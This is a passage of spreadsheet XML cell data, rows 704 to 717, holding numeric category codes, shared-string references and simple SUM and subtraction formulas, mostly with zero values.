      <c r="M704" s="17"/>
      <c r="N704" s="17"/>
      <c r="O704" s="17"/>
      <c r="P704" s="17"/>
      <c r="Q704" s="17"/>
      <c r="R704" s="17"/>
      <c r="S704" s="17"/>
      <c r="T704" s="17"/>
      <c r="U704" s="17"/>
      <c r="V704" s="17"/>
      <c r="W704" s="17"/>
      <c r="X704" s="17"/>
      <c r="Y704" s="17"/>
      <c r="Z704" s="17"/>
      <c r="AA704" s="17"/>
      <c r="AB704" s="17"/>
      <c r="AC704" s="17"/>
      <c r="AD704" s="17"/>
      <c r="AE704" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AF704" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AG704" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AH704" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AI704" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AJ704" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AK704" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AL704" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AM704" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AN704" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AO704" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AP704" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
    </row>
    <row r="705" ht="18" customHeight="1" spans="1:42">
      <c r="A705" s="10"/>
      <c r="B705" s="10"/>
      <c r="C705" s="28"/>
      <c r="D705" s="10">
        <v>2100406</v>
      </c>
      <c r="E705" s="16" t="s">
        <v>3511</v>
      </c>
      <c r="F705" s="14">
        <f t="shared" si="301"/>
        <v>0</v>
      </c>
      <c r="G705" s="17"/>
      <c r="H705" s="17"/>
      <c r="I705" s="17"/>
      <c r="J705" s="17"/>
      <c r="K705" s="17"/>
      <c r="L705" s="17"/>
      <c r="M705" s="17"/>
      <c r="N705" s="17"/>
      <c r="O705" s="17"/>
      <c r="P705" s="17"/>
      <c r="Q705" s="17"/>
      <c r="R705" s="17"/>
      <c r="S705" s="17"/>
      <c r="T705" s="17"/>
      <c r="U705" s="17"/>
      <c r="V705" s="17"/>
      <c r="W705" s="17"/>
      <c r="X705" s="17"/>
      <c r="Y705" s="17"/>
      <c r="Z705" s="17"/>
      <c r="AA705" s="17"/>
      <c r="AB705" s="17"/>
      <c r="AC705" s="17"/>
      <c r="AD705" s="17"/>
      <c r="AE705" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AF705" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AG705" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AH705" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AI705" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AJ705" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AK705" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AL705" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AM705" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AN705" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AO705" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AP705" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
    </row>
    <row r="706" ht="18" customHeight="1" spans="1:42">
      <c r="A706" s="10"/>
      <c r="B706" s="10"/>
      <c r="C706" s="28"/>
      <c r="D706" s="10">
        <v>2100407</v>
      </c>
      <c r="E706" s="16" t="s">
        <v>3512</v>
      </c>
      <c r="F706" s="14">
        <f t="shared" si="301"/>
        <v>0</v>
      </c>
      <c r="G706" s="17"/>
      <c r="H706" s="17"/>
      <c r="I706" s="17"/>
      <c r="J706" s="17"/>
      <c r="K706" s="17"/>
      <c r="L706" s="17"/>
      <c r="M706" s="17"/>
      <c r="N706" s="17"/>
      <c r="O706" s="17"/>
      <c r="P706" s="17"/>
      <c r="Q706" s="17"/>
      <c r="R706" s="17"/>
      <c r="S706" s="17"/>
      <c r="T706" s="17"/>
      <c r="U706" s="17"/>
      <c r="V706" s="17"/>
      <c r="W706" s="17"/>
      <c r="X706" s="17"/>
      <c r="Y706" s="17"/>
      <c r="Z706" s="17"/>
      <c r="AA706" s="17"/>
      <c r="AB706" s="17"/>
      <c r="AC706" s="17"/>
      <c r="AD706" s="17"/>
      <c r="AE706" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AF706" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AG706" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AH706" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AI706" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AJ706" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AK706" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AL706" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AM706" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AN706" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AO706" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AP706" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
    </row>
    <row r="707" ht="18" customHeight="1" spans="1:42">
      <c r="A707" s="10"/>
      <c r="B707" s="10"/>
      <c r="C707" s="28"/>
      <c r="D707" s="10">
        <v>2100408</v>
      </c>
      <c r="E707" s="16" t="s">
        <v>3513</v>
      </c>
      <c r="F707" s="14">
        <f t="shared" si="301"/>
        <v>0</v>
      </c>
      <c r="G707" s="17"/>
      <c r="H707" s="17"/>
      <c r="I707" s="17"/>
      <c r="J707" s="17"/>
      <c r="K707" s="17"/>
      <c r="L707" s="17"/>
      <c r="M707" s="17"/>
      <c r="N707" s="17"/>
      <c r="O707" s="17"/>
      <c r="P707" s="17"/>
      <c r="Q707" s="17"/>
      <c r="R707" s="17"/>
      <c r="S707" s="17"/>
      <c r="T707" s="17"/>
      <c r="U707" s="17"/>
      <c r="V707" s="17"/>
      <c r="W707" s="17"/>
      <c r="X707" s="17"/>
      <c r="Y707" s="17"/>
      <c r="Z707" s="17"/>
      <c r="AA707" s="17"/>
      <c r="AB707" s="17"/>
      <c r="AC707" s="17"/>
      <c r="AD707" s="17"/>
      <c r="AE707" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AF707" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AG707" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AH707" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AI707" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AJ707" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AK707" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AL707" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AM707" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AN707" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AO707" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AP707" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
    </row>
    <row r="708" ht="18" customHeight="1" spans="1:42">
      <c r="A708" s="10"/>
      <c r="B708" s="10"/>
      <c r="C708" s="28"/>
      <c r="D708" s="10">
        <v>2100409</v>
      </c>
      <c r="E708" s="16" t="s">
        <v>3514</v>
      </c>
      <c r="F708" s="14">
        <f t="shared" si="301"/>
        <v>4</v>
      </c>
      <c r="G708" s="17"/>
      <c r="H708" s="17"/>
      <c r="I708" s="17"/>
      <c r="J708" s="17"/>
      <c r="K708" s="17"/>
      <c r="L708" s="17">
        <v>4</v>
      </c>
      <c r="M708" s="17"/>
      <c r="N708" s="17"/>
      <c r="O708" s="17"/>
      <c r="P708" s="17"/>
      <c r="Q708" s="17"/>
      <c r="R708" s="17"/>
      <c r="S708" s="17"/>
      <c r="T708" s="17"/>
      <c r="U708" s="17"/>
      <c r="V708" s="17"/>
      <c r="W708" s="17"/>
      <c r="X708" s="17"/>
      <c r="Y708" s="17"/>
      <c r="Z708" s="17"/>
      <c r="AA708" s="17"/>
      <c r="AB708" s="17"/>
      <c r="AC708" s="17"/>
      <c r="AD708" s="17"/>
      <c r="AE708" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AF708" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AG708" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AH708" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AI708" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AJ708" s="17">
        <f t="shared" si="337"/>
        <v>4</v>
      </c>
      <c r="AK708" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AL708" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AM708" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AN708" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AO708" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AP708" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
    </row>
    <row r="709" ht="18" customHeight="1" spans="1:42">
      <c r="A709" s="10"/>
      <c r="B709" s="10"/>
      <c r="C709" s="28"/>
      <c r="D709" s="10">
        <v>2100410</v>
      </c>
      <c r="E709" s="16" t="s">
        <v>3515</v>
      </c>
      <c r="F709" s="14">
        <f t="shared" si="301"/>
        <v>5</v>
      </c>
      <c r="G709" s="17">
        <v>10</v>
      </c>
      <c r="H709" s="17"/>
      <c r="I709" s="17"/>
      <c r="J709" s="17"/>
      <c r="K709" s="17"/>
      <c r="L709" s="17">
        <v>4</v>
      </c>
      <c r="M709" s="17"/>
      <c r="N709" s="17"/>
      <c r="O709" s="17"/>
      <c r="P709" s="17"/>
      <c r="Q709" s="17"/>
      <c r="R709" s="17">
        <v>1</v>
      </c>
      <c r="S709" s="17">
        <v>10</v>
      </c>
      <c r="T709" s="17"/>
      <c r="U709" s="17"/>
      <c r="V709" s="17"/>
      <c r="W709" s="17"/>
      <c r="X709" s="17">
        <v>4</v>
      </c>
      <c r="Y709" s="17"/>
      <c r="Z709" s="17"/>
      <c r="AA709" s="17"/>
      <c r="AB709" s="17"/>
      <c r="AC709" s="17"/>
      <c r="AD709" s="17">
        <v>1</v>
      </c>
      <c r="AE709" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AF709" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AG709" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AH709" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AI709" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AJ709" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AK709" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AL709" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AM709" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AN709" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AO709" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AP709" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
    </row>
    <row r="710" ht="18" customHeight="1" spans="1:42">
      <c r="A710" s="10"/>
      <c r="B710" s="10"/>
      <c r="C710" s="28"/>
      <c r="D710" s="10">
        <v>2100499</v>
      </c>
      <c r="E710" s="16" t="s">
        <v>3516</v>
      </c>
      <c r="F710" s="14">
        <f t="shared" ref="F710:F773" si="338">SUM(I710:R710)</f>
        <v>0</v>
      </c>
      <c r="G710" s="17"/>
      <c r="H710" s="17"/>
      <c r="I710" s="17"/>
      <c r="J710" s="17"/>
      <c r="K710" s="17"/>
      <c r="L710" s="17"/>
      <c r="M710" s="17"/>
      <c r="N710" s="17"/>
      <c r="O710" s="17"/>
      <c r="P710" s="17"/>
      <c r="Q710" s="17"/>
      <c r="R710" s="17"/>
      <c r="S710" s="17"/>
      <c r="T710" s="17"/>
      <c r="U710" s="17"/>
      <c r="V710" s="17"/>
      <c r="W710" s="17"/>
      <c r="X710" s="17"/>
      <c r="Y710" s="17"/>
      <c r="Z710" s="17"/>
      <c r="AA710" s="17"/>
      <c r="AB710" s="17"/>
      <c r="AC710" s="17"/>
      <c r="AD710" s="17"/>
      <c r="AE710" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AF710" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AG710" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AH710" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AI710" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AJ710" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AK710" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AL710" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AM710" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AN710" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AO710" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
      <c r="AP710" s="17">
        <f t="shared" si="337"/>
        <v>0</v>
      </c>
    </row>
    <row r="711" ht="18" customHeight="1" spans="1:42">
      <c r="A711" s="10"/>
      <c r="B711" s="10"/>
      <c r="C711" s="28"/>
      <c r="D711" s="10">
        <v>21006</v>
      </c>
      <c r="E711" s="11" t="s">
        <v>3517</v>
      </c>
      <c r="F711" s="14">
        <f t="shared" si="338"/>
        <v>0</v>
      </c>
      <c r="G711" s="12">
        <f t="shared" ref="G711:R711" si="339">SUM(G712:G713)</f>
        <v>0</v>
      </c>
      <c r="H711" s="12">
        <f t="shared" si="339"/>
        <v>0</v>
      </c>
      <c r="I711" s="12">
        <f t="shared" si="339"/>
        <v>0</v>
      </c>
      <c r="J711" s="12">
        <f t="shared" si="339"/>
        <v>0</v>
      </c>
      <c r="K711" s="12">
        <f t="shared" si="339"/>
        <v>0</v>
      </c>
      <c r="L711" s="12">
        <f t="shared" si="339"/>
        <v>0</v>
      </c>
      <c r="M711" s="12">
        <f t="shared" si="339"/>
        <v>0</v>
      </c>
      <c r="N711" s="12">
        <f t="shared" si="339"/>
        <v>0</v>
      </c>
      <c r="O711" s="12">
        <f t="shared" si="339"/>
        <v>0</v>
      </c>
      <c r="P711" s="12">
        <f t="shared" si="339"/>
        <v>0</v>
      </c>
      <c r="Q711" s="12">
        <f t="shared" si="339"/>
        <v>0</v>
      </c>
      <c r="R711" s="12">
        <f t="shared" si="339"/>
        <v>0</v>
      </c>
      <c r="S711" s="12">
        <v>0</v>
      </c>
      <c r="T711" s="12">
        <v>0</v>
      </c>
      <c r="U711" s="12">
        <v>0</v>
      </c>
      <c r="V711" s="12">
        <v>0</v>
      </c>
      <c r="W711" s="12">
        <v>0</v>
      </c>
      <c r="X711" s="12">
        <v>0</v>
      </c>
      <c r="Y711" s="12">
        <v>0</v>
      </c>
      <c r="Z711" s="12">
        <v>0</v>
      </c>
      <c r="AA711" s="12">
        <v>0</v>
      </c>
      <c r="AB711" s="12">
        <v>0</v>
      </c>
      <c r="AC711" s="12">
        <v>0</v>
      </c>
      <c r="AD711" s="12">
        <v>0</v>
      </c>
      <c r="AE711" s="12">
        <f t="shared" ref="AE711:AP711" si="340">SUM(AE712:AE713)</f>
        <v>0</v>
      </c>
      <c r="AF711" s="12">
        <f t="shared" si="340"/>
        <v>0</v>
      </c>
      <c r="AG711" s="12">
        <f t="shared" si="340"/>
        <v>0</v>
      </c>
      <c r="AH711" s="12">
        <f t="shared" si="340"/>
        <v>0</v>
      </c>
      <c r="AI711" s="12">
        <f t="shared" si="340"/>
        <v>0</v>
      </c>
      <c r="AJ711" s="12">
        <f t="shared" si="340"/>
        <v>0</v>
      </c>
      <c r="AK711" s="12">
        <f t="shared" si="340"/>
        <v>0</v>
      </c>
      <c r="AL711" s="12">
        <f t="shared" si="340"/>
        <v>0</v>
      </c>
      <c r="AM711" s="12">
        <f t="shared" si="340"/>
        <v>0</v>
      </c>
      <c r="AN711" s="12">
        <f t="shared" si="340"/>
        <v>0</v>
      </c>
      <c r="AO711" s="12">
        <f t="shared" si="340"/>
        <v>0</v>
      </c>
      <c r="AP711" s="12">
        <f t="shared" si="340"/>
        <v>0</v>
      </c>
    </row>
    <row r="712" ht="18" customHeight="1" spans="1:42">
      <c r="A712" s="10"/>
      <c r="B712" s="10"/>
      <c r="C712" s="28"/>
      <c r="D712" s="10">
        <v>2100601</v>
      </c>
      <c r="E712" s="16" t="s">
        <v>3518</v>
      </c>
      <c r="F712" s="14">
        <f t="shared" si="338"/>
        <v>0</v>
      </c>
      <c r="G712" s="17"/>
      <c r="H712" s="17"/>
      <c r="I712" s="17"/>
      <c r="J712" s="17"/>
      <c r="K712" s="17"/>
      <c r="L712" s="17"/>
      <c r="M712" s="17"/>
      <c r="N712" s="17"/>
      <c r="O712" s="17"/>
      <c r="P712" s="17"/>
      <c r="Q712" s="17"/>
      <c r="R712" s="17"/>
      <c r="S712" s="17"/>
      <c r="T712" s="17"/>
      <c r="U712" s="17"/>
      <c r="V712" s="17"/>
      <c r="W712" s="17"/>
      <c r="X712" s="17"/>
      <c r="Y712" s="17"/>
      <c r="Z712" s="17"/>
      <c r="AA712" s="17"/>
      <c r="AB712" s="17"/>
      <c r="AC712" s="17"/>
      <c r="AD712" s="17"/>
      <c r="AE712" s="17">
        <f t="shared" ref="AE712:AP713" si="341">G712-S712</f>
        <v>0</v>
      </c>
      <c r="AF712" s="17">
        <f t="shared" si="341"/>
        <v>0</v>
      </c>
      <c r="AG712" s="17">
        <f t="shared" si="341"/>
        <v>0</v>
      </c>
      <c r="AH712" s="17">
        <f t="shared" si="341"/>
        <v>0</v>
      </c>
      <c r="AI712" s="17">
        <f t="shared" si="341"/>
        <v>0</v>
      </c>
      <c r="AJ712" s="17">
        <f t="shared" si="341"/>
        <v>0</v>
      </c>
      <c r="AK712" s="17">
        <f t="shared" si="341"/>
        <v>0</v>
      </c>
      <c r="AL712" s="17">
        <f t="shared" si="341"/>
        <v>0</v>
      </c>
      <c r="AM712" s="17">
        <f t="shared" si="341"/>
        <v>0</v>
      </c>
      <c r="AN712" s="17">
        <f t="shared" si="341"/>
        <v>0</v>
      </c>
      <c r="AO712" s="17">
        <f t="shared" si="341"/>
        <v>0</v>
      </c>
      <c r="AP712" s="17">
        <f t="shared" si="341"/>
        <v>0</v>
      </c>
    </row>
    <row r="713" ht="18" customHeight="1" spans="1:42">
      <c r="A713" s="10"/>
      <c r="B713" s="10"/>
      <c r="C713" s="28"/>
      <c r="D713" s="10">
        <v>2100699</v>
      </c>
      <c r="E713" s="16" t="s">
        <v>3519</v>
      </c>
      <c r="F713" s="14">
        <f t="shared" si="338"/>
        <v>0</v>
      </c>
      <c r="G713" s="17"/>
      <c r="H713" s="17"/>
      <c r="I713" s="17"/>
      <c r="J713" s="17"/>
      <c r="K713" s="17"/>
      <c r="L713" s="17"/>
      <c r="M713" s="17"/>
      <c r="N713" s="17"/>
      <c r="O713" s="17"/>
      <c r="P713" s="17"/>
      <c r="Q713" s="17"/>
      <c r="R713" s="17"/>
      <c r="S713" s="17"/>
      <c r="T713" s="17"/>
      <c r="U713" s="17"/>
      <c r="V713" s="17"/>
      <c r="W713" s="17"/>
      <c r="X713" s="17"/>
      <c r="Y713" s="17"/>
      <c r="Z713" s="17"/>
      <c r="AA713" s="17"/>
      <c r="AB713" s="17"/>
      <c r="AC713" s="17"/>
      <c r="AD713" s="17"/>
      <c r="AE713" s="17">
        <f t="shared" si="341"/>
        <v>0</v>
      </c>
      <c r="AF713" s="17">
        <f t="shared" si="341"/>
        <v>0</v>
      </c>
      <c r="AG713" s="17">
        <f t="shared" si="341"/>
        <v>0</v>
      </c>
      <c r="AH713" s="17">
        <f t="shared" si="341"/>
        <v>0</v>
      </c>
      <c r="AI713" s="17">
        <f t="shared" si="341"/>
        <v>0</v>
      </c>
      <c r="AJ713" s="17">
        <f t="shared" si="341"/>
        <v>0</v>
      </c>
      <c r="AK713" s="17">
        <f t="shared" si="341"/>
        <v>0</v>
      </c>
      <c r="AL713" s="17">
        <f t="shared" si="341"/>
        <v>0</v>
      </c>
      <c r="AM713" s="17">
        <f t="shared" si="341"/>
        <v>0</v>
      </c>
      <c r="AN713" s="17">
        <f t="shared" si="341"/>
        <v>0</v>
      </c>
      <c r="AO713" s="17">
        <f t="shared" si="341"/>
        <v>0</v>
      </c>
      <c r="AP713" s="17">
        <f t="shared" si="341"/>
        <v>0</v>
      </c>
    </row>
    <row r="714" ht="18" customHeight="1" spans="1:42">
      <c r="A714" s="10"/>
      <c r="B714" s="10"/>
      <c r="C714" s="28"/>
      <c r="D714" s="10">
        <v>21007</v>
      </c>
      <c r="E714" s="11" t="s">
        <v>3520</v>
      </c>
      <c r="F714" s="14">
        <f t="shared" si="338"/>
        <v>108</v>
      </c>
      <c r="G714" s="12">
        <f t="shared" ref="G714:R714" si="342">SUM(G715:G717)</f>
        <v>0</v>
      </c>
      <c r="H714" s="12">
        <f t="shared" si="342"/>
        <v>0</v>
      </c>
      <c r="I714" s="12">
        <f t="shared" si="342"/>
        <v>108</v>
      </c>
      <c r="J714" s="12">
        <f t="shared" si="342"/>
        <v>0</v>
      </c>
      <c r="K714" s="12">
        <f t="shared" si="342"/>
        <v>0</v>
      </c>
      <c r="L714" s="12">
        <f t="shared" si="342"/>
        <v>0</v>
      </c>
      <c r="M714" s="12">
        <f t="shared" si="342"/>
        <v>0</v>
      </c>
      <c r="N714" s="12">
        <f t="shared" si="342"/>
        <v>0</v>
      </c>
      <c r="O714" s="12">
        <f t="shared" si="342"/>
        <v>0</v>
      </c>
      <c r="P714" s="12">
        <f t="shared" si="342"/>
        <v>0</v>
      </c>
      <c r="Q714" s="12">
        <f t="shared" si="342"/>
        <v>0</v>
      </c>
      <c r="R714" s="12">
        <f t="shared" si="342"/>
        <v>0</v>
      </c>
      <c r="S714" s="12">
        <v>0</v>
      </c>
      <c r="T714" s="12">
        <v>0</v>
      </c>
      <c r="U714" s="12">
        <v>95</v>
      </c>
      <c r="V714" s="12">
        <v>0</v>
      </c>
      <c r="W714" s="12">
        <v>0</v>
      </c>
      <c r="X714" s="12">
        <v>0</v>
      </c>
      <c r="Y714" s="12">
        <v>0</v>
      </c>
      <c r="Z714" s="12">
        <v>0</v>
      </c>
      <c r="AA714" s="12">
        <v>0</v>
      </c>
      <c r="AB714" s="12">
        <v>0</v>
      </c>
      <c r="AC714" s="12">
        <v>0</v>
      </c>
      <c r="AD714" s="12">
        <v>0</v>
      </c>
      <c r="AE714" s="12">
        <f t="shared" ref="AE714:AP714" si="343">SUM(AE715:AE717)</f>
        <v>0</v>
      </c>
      <c r="AF714" s="12">
        <f t="shared" si="343"/>
        <v>0</v>
      </c>
      <c r="AG714" s="12">
        <f t="shared" si="343"/>
        <v>13</v>
      </c>
      <c r="AH714" s="12">
        <f t="shared" si="343"/>
        <v>0</v>
      </c>
      <c r="AI714" s="12">
        <f t="shared" si="343"/>
        <v>0</v>
      </c>
      <c r="AJ714" s="12">
        <f t="shared" si="343"/>
        <v>0</v>
      </c>
      <c r="AK714" s="12">
        <f t="shared" si="343"/>
        <v>0</v>
      </c>
      <c r="AL714" s="12">
        <f t="shared" si="343"/>
        <v>0</v>
      </c>
      <c r="AM714" s="12">
        <f t="shared" si="343"/>
        <v>0</v>
      </c>
      <c r="AN714" s="12">
        <f t="shared" si="343"/>
        <v>0</v>
      </c>
      <c r="AO714" s="12">
        <f t="shared" si="343"/>
        <v>0</v>
      </c>
      <c r="AP714" s="12">
        <f t="shared" si="343"/>
        <v>0</v>
      </c>
    </row>
    <row r="715" ht="18" customHeight="1" spans="1:42">
      <c r="A715" s="10"/>
      <c r="B715" s="10"/>
      <c r="C715" s="28"/>
      <c r="D715" s="10">
        <v>2100716</v>
      </c>
      <c r="E715" s="16" t="s">
        <v>3521</v>
      </c>
      <c r="F715" s="14">
        <f t="shared" si="338"/>
        <v>0</v>
      </c>
      <c r="G715" s="17"/>
      <c r="H715" s="17"/>
      <c r="I715" s="17"/>
      <c r="J715" s="17"/>
      <c r="K715" s="17"/>
      <c r="L715" s="17"/>
      <c r="M715" s="17"/>
      <c r="N715" s="17"/>
      <c r="O715" s="17"/>
      <c r="P715" s="17"/>
      <c r="Q715" s="17"/>
      <c r="R715" s="17"/>
      <c r="S715" s="17"/>
      <c r="T715" s="17"/>
      <c r="U715" s="17"/>
      <c r="V715" s="17"/>
      <c r="W715" s="17"/>
      <c r="X715" s="17"/>
      <c r="Y715" s="17"/>
      <c r="Z715" s="17"/>
      <c r="AA715" s="17"/>
      <c r="AB715" s="17"/>
      <c r="AC715" s="17"/>
      <c r="AD715" s="17"/>
      <c r="AE715" s="17">
        <f t="shared" ref="AE715:AP717" si="344">G715-S715</f>
        <v>0</v>
      </c>
      <c r="AF715" s="17">
        <f t="shared" si="344"/>
        <v>0</v>
      </c>
      <c r="AG715" s="17">
        <f t="shared" si="344"/>
        <v>0</v>
      </c>
      <c r="AH715" s="17">
        <f t="shared" si="344"/>
        <v>0</v>
      </c>
      <c r="AI715" s="17">
        <f t="shared" si="344"/>
        <v>0</v>
      </c>
      <c r="AJ715" s="17">
        <f t="shared" si="344"/>
        <v>0</v>
      </c>
      <c r="AK715" s="17">
        <f t="shared" si="344"/>
        <v>0</v>
      </c>
      <c r="AL715" s="17">
        <f t="shared" si="344"/>
        <v>0</v>
      </c>
      <c r="AM715" s="17">
        <f t="shared" si="344"/>
        <v>0</v>
      </c>
      <c r="AN715" s="17">
        <f t="shared" si="344"/>
        <v>0</v>
      </c>
      <c r="AO715" s="17">
        <f t="shared" si="344"/>
        <v>0</v>
      </c>
      <c r="AP715" s="17">
        <f t="shared" si="344"/>
        <v>0</v>
      </c>
    </row>
    <row r="716" ht="18" customHeight="1" spans="1:42">
      <c r="A716" s="10"/>
      <c r="B716" s="10"/>
      <c r="C716" s="28"/>
      <c r="D716" s="10">
        <v>2100717</v>
      </c>
      <c r="E716" s="16" t="s">
        <v>3522</v>
      </c>
      <c r="F716" s="14">
        <f t="shared" si="338"/>
        <v>0</v>
      </c>
      <c r="G716" s="17"/>
      <c r="H716" s="17"/>
      <c r="I716" s="17"/>
      <c r="J716" s="17"/>
      <c r="K716" s="17"/>
      <c r="L716" s="17"/>
      <c r="M716" s="17"/>
      <c r="N716" s="17"/>
      <c r="O716" s="17"/>
      <c r="P716" s="17"/>
      <c r="Q716" s="17"/>
      <c r="R716" s="17"/>
      <c r="S716" s="17"/>
      <c r="T716" s="17"/>
      <c r="U716" s="17"/>
      <c r="V716" s="17"/>
      <c r="W716" s="17"/>
      <c r="X716" s="17"/>
      <c r="Y716" s="17"/>
      <c r="Z716" s="17"/>
      <c r="AA716" s="17"/>
      <c r="AB716" s="17"/>
      <c r="AC716" s="17"/>
      <c r="AD716" s="17"/>
      <c r="AE716" s="17">
        <f t="shared" si="344"/>
        <v>0</v>
      </c>
      <c r="AF716" s="17">
        <f t="shared" si="344"/>
        <v>0</v>
      </c>
      <c r="AG716" s="17">
        <f t="shared" si="344"/>
        <v>0</v>
      </c>
      <c r="AH716" s="17">
        <f t="shared" si="344"/>
        <v>0</v>
      </c>
      <c r="AI716" s="17">
        <f t="shared" si="344"/>
        <v>0</v>
      </c>
      <c r="AJ716" s="17">
        <f t="shared" si="344"/>
        <v>0</v>
      </c>
      <c r="AK716" s="17">
        <f t="shared" si="344"/>
        <v>0</v>
      </c>
      <c r="AL716" s="17">
        <f t="shared" si="344"/>
        <v>0</v>
      </c>
      <c r="AM716" s="17">
        <f t="shared" si="344"/>
        <v>0</v>
      </c>
      <c r="AN716" s="17">
        <f t="shared" si="344"/>
        <v>0</v>
      </c>
      <c r="AO716" s="17">
        <f t="shared" si="344"/>
        <v>0</v>
      </c>
      <c r="AP716" s="17">
        <f t="shared" si="344"/>
        <v>0</v>
      </c>
    </row>
    <row r="717" ht="18" customHeight="1" spans="1:42">
      <c r="A717" s="10"/>
      <c r="B717" s="10"/>
      <c r="C717" s="28"/>
      <c r="D717" s="10">
        <v>2100799</v>
      </c>
      <c r="E717" s="16" t="s">
        <v>3523</v>
      </c>
      <c r="F717" s="14">
        <f t="shared" si="338"/>
        <v>108</v>
      </c>
      <c r="G717" s="17"/>
      <c r="H717" s="17"/>
      <c r="I717" s="17">
        <v>108</v>
      </c>
      <c r="J717" s="17"/>
      <c r="K717" s="17"/>
